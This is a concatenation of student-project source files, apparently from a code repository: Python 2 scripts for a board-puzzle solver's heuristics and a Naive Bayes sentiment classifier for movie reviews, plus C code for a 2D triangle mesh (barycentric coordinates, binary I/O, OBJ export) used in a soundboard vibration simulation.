print solved_board.count,"\n"
print
print "FC with LCV"
print
b4=init_board(s)
solved_board = solve(b4,True,False,False,True)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MRV"
b4=init_board(s)
solved_board = solve(b4,True,True,False,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MRV + LCV"
b4=init_board(s)
solved_board = solve(b4,True,True,False,True)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MCV"
b4=init_board(s)
solved_board = solve(b4,True,False,True,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MCV + LCV"
b4=init_board(s)
solved_board = solve(b4,True,False,True,True)
print is_complete(solved_board)
print solved_board.count,"\n"
#print is_complete(solved_board)
#print solved_board.count
# Bayes_Classifier
# Author(s) names AND netid's:
# <NAME> hra069
# <NAME> kmg381
# <NAME> pbh423
# Date: 2nd May, 2015
import math, os, pickle, re
class Bayes_Classifier:
    # Shared word-count dictionaries: goodDict counts tokens seen in positive
    # reviews, badDict in negative ones (class-level so a loaded cache is
    # visible to every instance).
    goodDict=dict()
    badDict=dict()
    def __init__(self, train=0):
        """This method initializes and trains the Naive Bayes Sentiment Classifier. If a
        cache of a trained classifier has been stored, it loads this cache. Otherwise,
        the system will proceed through training. After running this method, the classifier
        is ready to classify input text.

        Pass train=1 to force retraining even when pickled caches exist."""
        if (not os.path.isfile("goodDict.pickle") or not os.path.isfile("badDict.pickle") or train==1):
            self.train()
        else:
            self.goodDict=self.load("goodDict.pickle")
            self.badDict=self.load("badDict.pickle")
    def train(self):
        """Trains the Naive Bayes Sentiment Classifier."""
        # Review file names encode the star rating at index 7:
        # '1' marks a negative review, anything else positive.
        for files in os.walk("./movies_reviews"):
            for fileNames in files[2]:
                if fileNames[7]=='1':
                    currDict=self.badDict
                    otherDict=self.goodDict
                else:
                    currDict=self.goodDict
                    otherDict=self.badDict
                tokens=self.tokenize(self.loadFile("./movies_reviews/"+fileNames))
                for token in tokens:
                    if token in currDict:
                        currDict[token]+=1
                    else:
                        currDict[token]=1
                    # Ensure the token exists in the opposite class too so the
                    # smoothing below gives it a nonzero count there.
                    if token not in otherDict:
                        otherDict[token]=0
        # Add-one (Laplace) smoothing over both vocabularies.
        for key in self.goodDict:
            self.goodDict[key]+=1
        for key in self.badDict:
            self.badDict[key]+=1
        self.save(self.goodDict, "goodDict.pickle")
        self.save(self.badDict, "badDict.pickle")
    def classify(self, sText, verbose=0):
        """Given a target string sText, this function returns the most likely document
        class to which the target string belongs (i.e., positive, negative or neutral).
        """
        #defines if we use logs or normals
        log=1
        numGood=sum(self.goodDict.itervalues())
        numBad=sum(self.badDict.itervalues())
        tokens=self.tokenize(sText)
        # Log scores start at 0 (log of 1); raw probabilities start at 1.
        if log:
            goodProb=0
            badProb=0
        else:
            goodProb=1.0
            badProb=1.0
        for token in tokens:
            if log:
                if token in self.goodDict:
                    goodProb+= math.log(self.goodDict[token]/float(numGood))
                if token in self.badDict:
                    badProb+= math.log(self.badDict[token]/float(numBad))
            else:
                if token in self.goodDict:
                    goodProb*= (self.goodDict[token]/float(numGood))
                if token in self.badDict:
                    badProb*= (self.badDict[token]/float(numBad))
        if verbose:
            print goodProb
            print badProb
        # different types of classification. For evaluation we are not including negatives
        # (ties go to "negative" because of the >=).
        if goodProb>badProb:
            return "positive"
        elif badProb>=goodProb:
            return "negative"
#        if log:
#            diff=goodProb-badProb
#            avg= (goodProb+badProb)/2
#            if verbose:
#                print "diff:",diff
#                print "avg:",avg
#            if diff>abs(avg/10) or diff > 2:
#                return "positive"
#            elif diff<(avg/10) or diff < -2:
#                return 'negative'
#            else:
#                return 'neutral'
#        else:
#            if 10*goodProb>badProb:
#                return "positive"
#            elif 10*badProb>goodProb:
#                return "negative"
#            else:
#                return "neutral"
    def loadFile(self, sFilename):
        """Given a file name, return the contents of the file as a string."""
        f = open(sFilename, "r")
        sTxt = f.read()
        f.close()
        return sTxt
    def save(self, dObj, sFilename):
        """Given an object and a file name, write the object to the file using pickle."""
        # NOTE(review): text mode ("w") is fine for protocol-0 pickles on
        # POSIX; binary mode would be needed on Windows -- confirm target OS.
        f = open(sFilename, "w")
        p = pickle.Pickler(f)
        p.dump(dObj)
        f.close()
    def load(self, sFilename):
        """Given a file name, load and return the object stored in the file."""
        f = open(sFilename, "r")
        u = pickle.Unpickler(f)
        dObj = u.load()
        f.close()
        return dObj
    def tokenize(self, sText, bi=0):
        """Given a string of text sText, returns a list of the individual tokens that
        occur in that string (in order).
        Has been edited so it can include bigrams, which are enabled by the input."""
        #include two word strings
        if (bi):
            lTokens = []
            last = ""
            sToken = ""
            for c in sText:
                if re.match("[a-zA-Z0-9]", str(c)) != None or c == "\"" or c == "_" or c == "-":
                    sToken += c
                else:
                    if sToken != "":
                        if last!= "":
                            lTokens.append(last+" "+sToken)
                        last=sToken
                        lTokens.append(sToken)
                        sToken = ""
                    if c.strip() != "":
                        lTokens.append(str(c.strip()))
            if sToken != "":
                lTokens.append(sToken)
        else:
            lTokens = []
            sToken = ""
            for c in sText:
                if re.match("[a-zA-Z0-9]", str(c)) != None or c == "\"" or c == "_" or c == "-":
                    sToken += c
                else:
                    if sToken != "":
                        lTokens.append(sToken)
                        sToken = ""
                    if c.strip() != "":
                        lTokens.append(str(c.strip()))
            if sToken != "":
                lTokens.append(sToken)
        return lTokens
    def validate(self, folds=10):
        """uses N fold classification to validate the results.
        Splits the data into N groups, then trains on all but one group
        and tests on the excluded group."""
        # NOTE(review): `files` ends up holding the files of the *last*
        # directory os.walk visits -- fine for a flat corpus; confirm.
        for stuff in os.walk("./movies_reviews"):
            files=stuff[2]
        numFiles=len(files)
        foldSize=numFiles/folds
        groups=[]
        for i in range(folds):
            groups.append(files[i*foldSize:(i+1)*foldSize])
        # NOTE(review): hard-coded 10 assumes folds == 10.
        trainGroups=[None]*10
        for i in range(folds):
            trainGroups[i]=[]
            for exclusion in range(folds):
                if exclusion!=i:
                    trainGroups[i]+=groups[exclusion]
        precision=[None]*folds
        recall=[None]*folds
        accuracy=[None]*folds
        fmeasure=[None]*folds
        for i in range(folds):
            # Retrain from scratch on everything except the held-out fold.
            self.goodDict.clear()
            self.badDict.clear()
            self.trainFileName(trainGroups[i])
            results = self.classifyBatch(groups[i])
            for x in results:
                print x
            trueNeg = float(results[0])
            wrongNeg = float(results[1])
            truePos = float(results[2])
            falsePos = float(results[3])
            positive = float(results[4])
            total = float(results[6])
            precision[i] = truePos/(truePos+falsePos)
            print "precision:",precision[i]
            recall[i] = float(truePos/(truePos+wrongNeg))
            print "recall:",recall[i]
            accuracy[i] = float((truePos+trueNeg)/(total))
            print "accuracy",accuracy[i]
            fmeasure[i] = float(2*truePos/(2*truePos+falsePos+wrongNeg))
            print "fmeasure",fmeasure[i]
        print "Final accuracies"
        print "Precision:",avg(precision)
        print "Recall:", avg(recall)
        print "Accuracy:",avg(accuracy)
        print "Fmeasure",avg(fmeasure)
    def trainFileName(self, files):
        """Alternative training method that takes a list of filenames and then trains on them. Made so we can exclude a test set easily"""
        for fileNames in files:
            if fileNames[7]=='1':
                currDict=self.badDict
                otherDict=self.goodDict
            else:
                currDict=self.goodDict
                otherDict=self.badDict
            tokens=self.tokenize(self.loadFile("./movies_reviews/"+fileNames))
            for token in tokens:
                if token in currDict:
                    currDict[token]+=1
                else:
                    currDict[token]=1
                if token not in otherDict:
                    otherDict[token]=0
        # Add-one smoothing, mirroring train().
        for key in self.goodDict:
            self.goodDict[key]+=1
        for key in self.badDict:
            self.badDict[key]+=1
    def classifyBatch(self, files):
        """Calls classify on all files in the list. Tallies up the results
        as [correctNeg, wrongNeg, correctPos, wrongPos, positive, negative, total]."""
        positive = 0
        negative = 0
        wrongPos=0
        correctPos=0
        wrongNeg=0
        correctNeg=0
        total = 0
        for fileName in files:
            result=self.classify(self.loadFile("./movies_reviews/"+fileName))
            total+=1
            # Ground truth comes from the file-name rating digit (see train()).
            if fileName[7]=='1':
                negative+=1
                if result=="positive":
                    wrongNeg+=1
                elif result=="negative":
                    correctNeg+=1
            else:
                positive+=1
                if result=="positive":
                    correctPos+=1
                elif result=="negative":
                    wrongPos+=1
        return [correctNeg, wrongNeg, correctPos, wrongPos,positive,negative,total]
def avg(l):
    """Arithmetic mean of a non-empty sequence of numbers, as a float."""
    total = sum(l)
    return total / float(len(l))
| ff30c12538ccdbecbda7e66f69d37969315b5a1d | [
"Python"
] | 7 | Python | hannah-rose/348_Projects | d61c809724101c26db3d7c01004dd26d59a422a3 | 127c8a0c891d299f18860a48fbfffcc98266e419 |
refs/heads/master | <file_sep>#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <assert.h>
#include "mesh.h"
//#define freq 44100
#define freq 44100 //352800
#define duration 1
struct Mesh *mesh;
REAL *uc, *up, *us;
REAL *d4uc, *d4up;
// Temporaries used to avoid multiple dynamic allocations
REAL *d_tmp, *d4x, *d4y, *d2xy;
/* Sets up the plate-simulation constants for the soundboard model.
 * NOTE(review): the time-stepping loop that would fill `son` and use the
 * coefficients below is not present in this file -- most locals are
 * currently unused. */
int main()
{
    // Read binary mesh
    mesh = (struct Mesh*)malloc(sizeof(struct Mesh));
    loadBinaryMesh(mesh, "binaryMesh.bin");
    REAL dt = 1.0f/freq;            // simulation time step (s)
    REAL son[freq*duration];        // output sample buffer (`duration` s of audio)
    REAL delta = 0.0029; // m, soundboard thickness
    REAL rho = 350.0; // kg.m-3
    // REAL eta = 0.005; // s
    REAL eta = 0.0; // s, internal damping (currently disabled)
    REAL R = 7.0; // s-1
    // Precomputed update coefficients for the plate equation.
    REAL d2 = delta*delta / (12.0*rho);
    REAL A = dt*dt / (delta * rho);
    REAL B = -(eta+dt) * dt * d2; //TODO : sign might be wrong
    REAL C = eta * dt * d2; //TODO : sign might be wrong
    // REAL B = (eta+dt) * dt * d2; //TODO : sign might be wrong
    // REAL C = - eta * dt * d2; //TODO : sign might be wrong
    REAL D = R * dt;
    // Orthotropic material parameters (Poisson ratios and moduli).
    REAL nu_xy = 0.3;
    REAL nu_yx = 0.3; //symmetric ???
    REAL E_x = 9925.0 * 1.0e6; //Pa
    REAL E_y = 852.0 * 1.0e6; //Pa
    REAL G_xy = 600.0 * 1.0e6; //Pa = kg /(m.s^2) = N / m^2
    REAL a = E_x / (1.0-nu_xy*nu_yx) ;
    REAL b = 4.0 * G_xy - (E_y*nu_xy + E_x*nu_yx)/ (1.0-nu_xy*nu_yx);
    REAL c = E_y / (1.0-nu_xy*nu_yx);
}
<file_sep>
#include "mesh.h"
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <assert.h>
#define CORRECTION
/*------------------------------------------------------------------------*/
/* Release every heap allocation owned by the mesh, in reverse order of
 * construction.  The Mesh struct itself is left for the caller to free. */
void freeMesh(struct Mesh *m) {
    free(m->gradOp);
    free(m->barycoord);
    free(m->neighbors);
    free(m->nbNeighbors);
    free(m->v_boundary_id);
    free(m->v_edges);
    free(m->v_triangles);
    free(m->v_points);
}
/*------------------------------------------------------------------------*/
/* Serialize the whole mesh (counts, geometry, adjacency, barycentric
 * coordinates and gradient operators) to a raw binary file.  The layout
 * mirrors loadBinaryMesh exactly. */
void saveBinaryMesh(struct Mesh *m, const char* filename)
{
    FILE *f = fopen(filename,"wb");
    /* Consistent with saveToObj: report and abort on I/O failure instead
     * of dereferencing a NULL FILE*. */
    if (f == (FILE *) NULL) {
        printf(" Error: Cannot create file %s.\n", filename);
        exit(1);
    }
    fwrite(&(m->n_points), sizeof(int), 1, f);
    fwrite(&(m->n_triangles), sizeof(int), 1, f);
    fwrite(&(m->n_edges), sizeof(int), 1, f);
    fwrite(m->v_points, sizeof(struct vec2), m->n_points, f);
    fwrite(m->v_triangles, sizeof(struct triangle), m->n_triangles, f);
    fwrite(m->v_edges, sizeof(struct edge), m->n_edges, f);
    fwrite(m->v_boundary_id, sizeof(int), m->n_points, f);
    fwrite(&(m->nmax), sizeof(int), 1, f);
    fwrite(m->nbNeighbors, sizeof(int), m->n_points, f);
    fwrite(m->neighbors, sizeof(int), m->n_points*m->nmax, f);
    fwrite(m->barycoord, sizeof(REAL), m->n_points*m->nmax, f);
    fwrite(m->gradOp, sizeof(REAL), m->n_points*(2*(m->nmax+1)), f);
    fclose(f);
}
/*------------------------------------------------------------------------*/
void loadBinaryMesh(struct Mesh *m, const char* filename) {
FILE *f = fopen(filename,"rb");
fread(&(m->n_points), sizeof(int), 1, f);
fread(&(m->n_triangles), sizeof(int), 1, f);
fread(&(m->n_edges), sizeof(int), 1, f);
m->v_points = (struct vec2*) malloc(sizeof(struct vec2) * m->n_points);
fread(m->v_points, sizeof(struct vec2), m->n_points, f);
m->v_triangles = (struct triangle*) malloc(sizeof(struct triangle) * m->n_triangles);
fread(m->v_triangles, sizeof(struct triangle), m->n_triangles, f);
m->v_edges = (struct edge*) malloc(sizeof(struct edge) * m->n_edges);
fread(m->v_edges, sizeof(struct edge), m->n_edges, f);
m->v_boundary_id = (int*) malloc(sizeof(int) * m->n_points);
fread(m->v_boundary_id, sizeof(int), m->n_points, f);
fread(&(m->nmax), sizeof(int), 1, f);
m->nbNeighbors = (int*) malloc(sizeof(int) * m->n_points);
fread(m->nbNeighbors, sizeof(int), m->n_points, f);
m->neighbors = (int*) malloc(sizeof(int) * m->n_points*m->nmax);
fread(m->neighbors, sizeof(int), m->n_points*m->nmax, f);
m->barycoord = (REAL*) malloc(sizeof(REAL) * m->n_points*m->nmax);
fread(m->barycoord, sizeof(REAL), m->n_points*m->nmax, f);
m->gradOp = (REAL*) malloc(sizeof(REAL) * m->n_points*(2*(m->nmax+1)));
fread(m->gradOp, sizeof(REAL), m->n_points*(2*(m->nmax+1)), f);
fclose(f);
}
/*------------------------------------------------------------------------*/
/* Export the mesh as a Wavefront OBJ file, using u (scaled by factor) as
 * the Z coordinate of each vertex -- useful to visualize a scalar field
 * (e.g. displacement) over the plate. */
void saveToObj(struct Mesh *m, REAL *u, REAL factor, const char* filename)
{
    FILE *outfile = fopen(filename, "w");
    if (outfile == (FILE *) NULL) {
        printf(" Error: Cannot create file %s.\n", filename);
        exit(1);
    }
    fprintf(outfile, "# nb vertices = %d, nb faces = %d\n", m->n_points, m->n_triangles);
    for (int i = 0; i<m->n_points; i++) {
        fprintf(outfile, "v %.17g %.17g %.17g\n",
                m->v_points[i].x,
                m->v_points[i].y,
                u[i]*factor);
    }
    // WARNING : obj file indices start at 1
    for (int i = 0; i<m->n_triangles; i++) {
        fprintf(outfile, "f %4d %4d %4d\n",
                m->v_triangles[i].v_id[0]+1,
                m->v_triangles[i].v_id[1]+1,
                m->v_triangles[i].v_id[2]+1);
    }
    fprintf(outfile, "\n");
    fclose(outfile);
}
/*------------------------------------------------------------------------*/
<file_sep>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <assert.h>
#include "mesh.h"
/*------------------------------------------------------------------------*/
/* Compute R = A * B for row-major matrices (fulfils the STEP 7 TODO).
 *   A: (n_row x n), B: (n x n_col), R: (n_row x n_col), R preallocated.
 * R must not alias A or B. */
void matrixMult(REAL *A, REAL *B, REAL *R, int n_row, int n_col, int n) {
    for (int i = 0; i < n_row; ++i) {
        for (int j = 0; j < n_col; ++j) {
            REAL acc = (REAL)0;
            for (int k = 0; k < n; ++k) {
                acc += A[i*n + k] * B[k*n_col + j];
            }
            R[i*n_col + j] = acc;
        }
    }
}
/* Intended to build the matrix operator (up to 2 x (nmax+1), row-major)
 * giving the gradient at vertex i from the values at i and its neighbors;
 * B is caller-provided scratch of the same capacity (see the prototype
 * documentation in mesh.h). */
void buildOpGrad(struct Mesh *mesh, int i, REAL *opM, REAL *B)
{
    ////////////////////////////////////////////////////////////////
    //TODO : STEP 8
    //TODO compute matrix opM
    // NOTE(review): still a stub -- callers currently get opM unchanged.
    ////////////////////////////////////////////////////////////////
}
/*------------------------------------------------------------------------*/
/* Take ownership of the arrays produced by Triangle (in) and finish
 * initializing the Mesh: counts, geometry, per-vertex adjacency lists and
 * generalized barycentric coordinates.  The stolen pointers in `in` are
 * set to NULL so Triangle's cleanup cannot double-free them. */
void moveAndInit(struct triangulateio *in, struct Mesh *mesh)
{
    assert(in->numberofcorners==3);
    mesh->n_points = in->numberofpoints;
    mesh->n_triangles = in->numberoftriangles;
    mesh->n_edges = in->numberofedges;
    mesh->v_points = (struct vec2*)in->pointlist;
    in->pointlist = NULL;
    mesh->v_triangles = (struct triangle*)in->trianglelist;
    in->trianglelist = NULL;
    mesh->v_edges = (struct edge*)in->edgelist;
    in->edgelist = NULL;
    mesh->v_boundary_id = in->pointmarkerlist;
    in->pointmarkerlist = NULL;
    // Initialize adjacency between vertices
    mesh->nbNeighbors = (int *) calloc(mesh->n_points,sizeof(int));
    // first we need to find the maximal number of neighbors per vertex
    mesh->nmax = 0;
    for(int i = 0; i<mesh->n_edges; ++i ) {
        mesh->nbNeighbors[ mesh->v_edges[i].v_id[0] ] += 1;
        mesh->nbNeighbors[ mesh->v_edges[i].v_id[1] ] += 1;
    }
    for(int i = 0; i<mesh->n_points; ++i ) {
        if(mesh->nbNeighbors[i]>mesh->nmax)
            mesh->nmax = mesh->nbNeighbors[i];
        mesh->nbNeighbors[i] = 0; // we need it to be zero for init of next step
    }
    printf("Maximum number of neighbors per Vertex : %d\n", mesh->nmax);
    // Second pass: fill the flat (n_points x nmax) neighbor table, reusing
    // nbNeighbors as a per-vertex insertion cursor.
    mesh->neighbors = (int *) malloc(mesh->nmax * mesh->n_points*sizeof(int));
    for(int i = 0; i<mesh->n_edges; ++i ) {
        int k = mesh->v_edges[i].v_id[0];
        int l = mesh->v_edges[i].v_id[1];
        mesh->neighbors[k*mesh->nmax + mesh->nbNeighbors[k]] = l;
        mesh->nbNeighbors[k] += 1;
        mesh->neighbors[l*mesh->nmax + mesh->nbNeighbors[l]] = k;
        mesh->nbNeighbors[l] += 1;
    }
    mesh->barycoord = NULL;
    // Initialize the generalized barycentric coordinate
    computeMeanValueCoordinates(mesh);
}
/*------------------------------------------------------------------------*/
/* (Re)allocate and fill mesh->barycoord with one weight per
 * (vertex, neighbor) pair.  Currently a placeholder: every neighbor gets
 * the uniform weight 1/degree; the debug loops below print the weight sums
 * and the reconstruction error of interior vertices. */
void computeMeanValueCoordinates(struct Mesh *mesh)
{
    if(mesh->barycoord!=NULL) {
        free(mesh->barycoord);
    }
    mesh->barycoord = (REAL *) calloc(mesh->nmax*mesh->n_points,sizeof(REAL));
    ////////////////////////////////////////////////////////////////
    //TODO : STEP 9
    //TODO : should be replaced by computation of generalized barycentric coordinates
    for(int i = 0; i<mesh->n_points; ++i ) {
        REAL v = 1.0/((REAL)mesh->nbNeighbors[i]);
        for (int j = 0; j<mesh->nbNeighbors[i]; ++j) {
            mesh->barycoord[i*mesh->nmax + j] = v;
        }
    }
    ////////////////////////////////////////////////////////////////
    // Debug: the weights of each vertex should sum to 1.
    for(int i = 0; i<mesh->n_points; ++i ) {
        REAL sum = 0.0;
        for (int j = 0; j<mesh->nbNeighbors[i];++j) {
            sum+= mesh->barycoord[i*mesh->nmax+j];
        }
        printf("%f",sum);
        printf("\n");
    }
    // Print every interior vertex's coordinates relative to its neighbors.
    for(int i = 0; i<mesh->n_points; ++i ) {
        if(mesh->v_boundary_id[i]==0)
            for (int j = 0; j<mesh->nbNeighbors[i];++j) {
                printf("%g ",mesh->barycoord[i*mesh->nmax+j]);
            }
        printf("\n");
    }
    // Simple test : compare the vertex with the position obtained from barycentric coordinates
    for(int i = 0; i<mesh->n_points; ++i ) {
        if(mesh->v_boundary_id[i]==0) {
            REAL x = 0.0;
            REAL y = 0.0;
            for(int k=0; k<mesh->nbNeighbors[i]; ++k) {
                x += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].x
                    * mesh->barycoord[i*mesh->nmax+k];
                y += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].y
                    * mesh->barycoord[i*mesh->nmax+k];
            }
            printf("Xerr : %g", fabs(mesh->v_points[i].x-x));
            printf(" Yerr : %g\n", fabs(mesh->v_points[i].y-y));
        }
    }
}
/*------------------------------------------------------------------------*/
<file_sep>
#pragma once
#ifndef MESH_H
#define MESH_H
#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
#ifndef TRIANGLE_H
#define TRIANGLE_H
#include "triangle.h"
#endif
/*****************************************************************************/
/* */
/* a mesh data structure, mostly a copy form the one returned by triangle */
/* */
/*****************************************************************************/
/** A point in 2 dimensions.
 */
struct vec2 {
    REAL x, y;
};
/** Vertex ids (into Mesh.v_points) of a triangle.
 */
struct triangle {
    int v_id[3];
};
/** Vertex ids (into Mesh.v_points) of an edge.
 */
struct edge {
    int v_id[2];
};
/** A mesh in 2 dimensions.
 */
struct Mesh {
    int n_points; // number of points
    int n_triangles; // number of triangles
    int n_edges; // number of edges
    struct vec2* v_points;
    struct triangle *v_triangles;
    struct edge *v_edges;
    int *v_boundary_id; // 1 value per vertex, val of 0 means not on boundary
    int nmax; //maximum number of neighbors per vertex
    int *nbNeighbors; // 1 value per vertex, number of neighbors
    int *neighbors; // id of neighbors (flat n_points x nmax table)
    REAL *barycoord; // generalized barycentric coordinate per (vertex, neighbor)
    // we end up with some unused memory, but we have direct access to data of vertex i :
    // neighbors[i*nmax + j] => id of j-th neighbors of vertex i
    // barycoord[i*nmax + j] => associated barycentric coordinates
    // NB : we could have store pointer to struct instead, but this would have required more
    // pointer management and memory allocations
    // we can also store precomputed matrices here (avoid a large amount of redundant
    // computation at the expense of memory)
    // NOTE(review): the binary I/O and freeMesh code in another source file
    // accesses a gradOp field that this struct does not declare -- confirm
    // which header revision those files compile against.
};
/** Initialize mesh structure from triangle output (takes ownership of buffers). */
void moveAndInit(struct triangulateio *in, struct Mesh *mesh);

/** Computation of generalized barycentric coordinates (fills mesh->barycoord). */
void computeMeanValueCoordinates(struct Mesh *mesh);

/** Compute the multiplication A*B and set the result in R.
 *
 * All matrices are stored in row major format.
 *
 * A is of size (n_row,n)
 * B is of size (n, n_col)
 * R is of size (n_row,n_col)
 *
 * The memory of R should already be allocated.
 */
void matrixMult(REAL *A, REAL *B, REAL *R, int n_row, int n_col, int n);

/** Compute the matrix operator corresponding to the gradient of vertex i
 *
 * All matrices are stored in row major format and their memory should be
 * already allocated.
 *
 * opM will contain the result, it should be able to represent a matrix up to size (2,nmax+1)
 *
 * B should be able to represent a matrix up to size (2,nmax+1)
 */
void buildOpGrad(struct Mesh *mesh, int i, REAL *opM, REAL *B);
#endif
<file_sep> // correct the id of boundary (as newly created point are of id 1...)
// assume 2 type of boundary cannot be connected...
int not_finished = 1;
while(not_finished) {
not_finished = 0;
for(int i = 0; i<mesh.n_points; ++i ) {
if(mesh.v_boundary_id[i] == 1) {
int found = 0;
int nn = mesh.nbNeighbors[i];
for(int k=0; k<nn; ++k) {
int n_id = mesh.neighbors[i*mesh.nmax+k];
if(mesh.v_boundary_id[n_id]==2) {
mesh.v_boundary_id[i] = 2;
found = 1;
} else if(mesh.v_boundary_id[n_id]==3) {
mesh.v_boundary_id[i] = 3;
found = 1;
}
}
if(!found) not_finished = 1;
}
}
}
// mark neighbors to boundaries
for(int i = 0; i<mesh.n_points; ++i ) {
if(mesh.v_boundary_id[i] == 0) {
int nn = mesh.nbNeighbors[i];
for(int k=0; k<nn; ++k) {
int n_id = mesh.neighbors[i*mesh.nmax+k];
if(mesh.v_boundary_id[n_id]==2) {
mesh.v_boundary_id[i] = -2;
}
}
}
}
//////////////////////////////
void computeMeanValueCoordinates(struct Mesh *mesh)
{
if(mesh->barycoord!=NULL) {
free(mesh->barycoord);
}
mesh->barycoord = (REAL *) calloc(mesh->nmax*mesh->n_points,sizeof(REAL));
#ifdef CORRECTION
//#if 0
// allocate temporary data structures to store 3 REAL per triangles (1 per triangle's edges)
REAL *tanvalues = (REAL *) malloc(3*mesh->n_triangles*sizeof(REAL));
REAL *normvalues = (REAL *) malloc(3*mesh->n_triangles*sizeof(REAL));
for(int i = 0; i<mesh->n_triangles; i++)
{
for(int j=0; j<3; ++j) {
int v0 = mesh->v_triangles[i].v_id[j];
int v1 = mesh->v_triangles[i].v_id[(j+1)%3] ;
REAL dx_1 = mesh->v_points[v1].x - mesh->v_points[v0].x;
REAL dy_1 = mesh->v_points[v1].y - mesh->v_points[v0].y;
REAL n1 = sqrt(dx_1*dx_1+dy_1*dy_1);
normvalues[ i * 3 + j] = n1;
int v2 = mesh->v_triangles[i].v_id[(j+2)%3];
REAL dx_2 = mesh->v_points[v2].x - mesh->v_points[v0].x;
REAL dy_2 = mesh->v_points[v2].y - mesh->v_points[v0].y;
REAL n2 = sqrt(dx_2*dx_2+dy_2*dy_2);
REAL dot = (dx_1*dx_2 + dy_1*dy_2)/(n1*n2);
REAL cross = (dx_1*dy_2 - dy_1*dx_2)/(n1*n2);
assert(cross>0.0);
REAL z = (1.0-dot)/cross;
//REAL z = cross/(1.0+dot);
tanvalues[ i * 3 + j] = z;
}
}
for(int i = 0; i<mesh->n_triangles; i++){
for(int j=0; j<3; ++j) {
int v0 = mesh->v_triangles[i].v_id[j];
//look for the rigth index
int v1 = mesh->v_triangles[i].v_id[(j+1)%3] ;
for(int k=0; k<mesh->nbNeighbors[v0] ; ++k) {
if(mesh->neighbors[v0*mesh->nmax+k] == v1) {
mesh->barycoord[v0*mesh->nmax+k] += tanvalues[ i * 3 + j];
break;
}
}
int v2 = mesh->v_triangles[i].v_id[(j+2)%3] ;
for(int k=0; k<mesh->nbNeighbors[v0]; ++k) {
if(mesh->neighbors[v0*mesh->nmax+k] == v2) {
mesh->barycoord[v0*mesh->nmax+k] += tanvalues[ i * 3 + j];
break;
}
}
}
}
// perform the division by norm
for(int i = 0; i<mesh->n_triangles; i++){
for(int j=0; j<3; ++j) {
int v0 = mesh->v_triangles[i].v_id[j];
int v1 = mesh->v_triangles[i].v_id[(j+1)%3] ;
//look for the rigth index
for(int k=0; k<mesh->nbNeighbors[v0]; ++k) {
if(mesh->neighbors[v0*mesh->nmax+k] == v1) {
mesh->barycoord[v0*mesh->nmax+k] /= normvalues[ i * 3 + j];
break;
}
}
}
}
// Normalize all mean value coordinates !
for(int i = 0; i<mesh->n_points; ++i ) {
REAL sum = 0.0;
for (int j = 0; j<mesh->nbNeighbors[i]; ++j) {
sum += mesh->barycoord[i*mesh->nmax + j];
}
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
mesh->barycoord[i*mesh->nmax + j] /= sum;
}
}
#else
//TODO : shoud be replaced by computation of generalized barycentric coordinates
for(int i = 0; i<mesh->n_points; ++i ) {
REAL v = 1.0/((REAL)mesh->nbNeighbors[i]);
for (int j = 0; j<mesh->nbNeighbors[i]; ++j) {
mesh->barycoord[i*mesh->nmax + j] = v;
}
}
#endif
// testMeanValueCoordinates(mesh);
for(int i = 0; i<mesh->n_points; ++i ) {
REAL sum = 0.0;
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
sum+= mesh->barycoord[i*mesh->nmax+j];
}
assert(fabs(sum-1.0) < 11.0e-8);
}
// Affiche les coordonnées de tout les vertex relatif à leur voisin
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->v_boundary_id[i]==0) {
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
printf("%g ",mesh->barycoord[i*mesh->nmax+j]);
}
printf("\n");
}
}
// Simple test : compare the vertex with the position obtained from barycentric coordinates
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->v_boundary_id[i]==0) {
REAL x = 0.0;
REAL y = 0.0;
for(int k=0; k<mesh->nbNeighbors[i]; ++k) {
x += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].x
* mesh->barycoord[i*mesh->nmax+k];
y += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].y
* mesh->barycoord[i*mesh->nmax+k];
}
printf("Xerr : %g", fabs(mesh->v_points[i].x-x));
printf(" Yerr : %g\n", fabs(mesh->v_points[i].y-y));
}
}
}
<file_sep>
#pragma once
#ifndef MESH_H
#define MESH_H
#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
/*****************************************************************************/
/* */
/* a mesh data structure, mostly a copy form the one returned by triangle */
/* */
/*****************************************************************************/
/** A point in 2 dimension
*/
struct vec2 {
REAL x, y;
};
/** Vertices (id) of a triangle
*/
struct triangle {
int v_id[3];
};
/** Vertices (id) of an edge
*/
struct edge {
int v_id[2];
};
/** A mesh in 2 dimensions (variant with a precomputed gradient operator).
 *
 * Same dense (n_points x nmax) row-major neighbor layout as described below.
 */
struct Mesh {
    int n_points; // number of points
    int n_triangles; // number of triangles
    int n_edges;
    struct vec2* v_points;
    struct triangle *v_triangles;
    struct edge *v_edges;
    int *v_boundary_id; // 1 value per vertex, val of 0 means not on boundary
    int nmax; //maximum number of neighbors per vertex
    int *nbNeighbors; // 1 value per vertex, numbers of neighbors
    int *neighbors; // id of neighbors
    REAL *barycoord; // per-neighbor barycentric weight, same layout as neighbors
    // we end up with some unused memory, but we have direct access to data of vertex i :
    // neighbors[i*nmax + j] => id of j-th neighbor of vertex i
    // barycoord[i*nmax + j] => associated barycentric coordinate
    // NB : we could have stored pointers to structs instead, but this would have required more
    // pointer management and memory allocations
    // we can also store precomputed matrices here (avoid a large amount of redundant
    // computation at the expense of memory)
    REAL *gradOp; // precomputed per-vertex gradient operator (see buildOpGrad)
};
/** Free inner pointer of a mesh
*/
void freeMesh(struct Mesh *m);
/** Save mesh to binary file
*/
void saveBinaryMesh(struct Mesh *m, const char* filename);
/** Load mesh from binary file
*/
void loadBinaryMesh(struct Mesh *m, const char* filename);
/** Save mesh to obj format
*/
